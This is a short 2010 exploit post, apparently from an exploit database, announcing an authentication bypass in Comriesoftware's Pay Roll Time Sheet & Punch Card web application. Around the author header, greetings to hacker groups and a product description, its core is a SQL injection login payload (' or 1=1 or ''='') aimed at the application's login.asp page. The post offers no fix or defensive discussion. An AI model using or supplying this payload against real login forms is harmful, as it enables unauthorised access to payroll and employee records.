38 lines
No EOL
1.7 KiB
Text
38 lines
No EOL
1.7 KiB
Text
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
|
|
Exploit Title:Comriesoftware Pay Roll Time Sheet & Punch Card Authentication Bypass Vulnerability
|
|
Version:1.0
|
|
Price:50$
|
|
Vendor url:http://www.comriesoftware.net/codewidgets/product.aspx?key=123
|
|
Published: 2010-11-02
|
|
Thanx to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic, M4n0j,SeeMe, gunslinger, Th3 RDX.
|
|
Greetz to : Inj3ct0r Exploit DataBase (inj3ct0r.com)
|
|
Special Greetz: Topsecure.net,0xr00t.com,Andhrahackers.com
|
|
Shoutzz:- To all ICW & Inj3ct0r members.
|
|
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
|
|
Description:
|
|
|
|
Microsoft? Access 2000/XPASP web Interface. Includes all source code and demo data.
|
|
Punch Card calculates hours from time in to time out and can span across days,Calculates Regular Hours,
|
|
Overtime Hours and Statutory Hours. Code: ASP 3.0 & VBScript
|
|
?
|
|
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
|
|
Vulnerability:
|
|
|
|
*Authentication ByPass Vulnerability*
|
|
|
|
Pattern: ' or 1=1 or ''=''
|
|
|
|
DEMO URL :
|
|
|
|
http://server/login.asp
|
|
|
|
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
|
|
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
|
|
# 0day n0 m0re #
|
|
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
|
|
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
|
|
|
|
|
|
--
|
|
With R3gards,
|
|
L0rd CrusAd3r |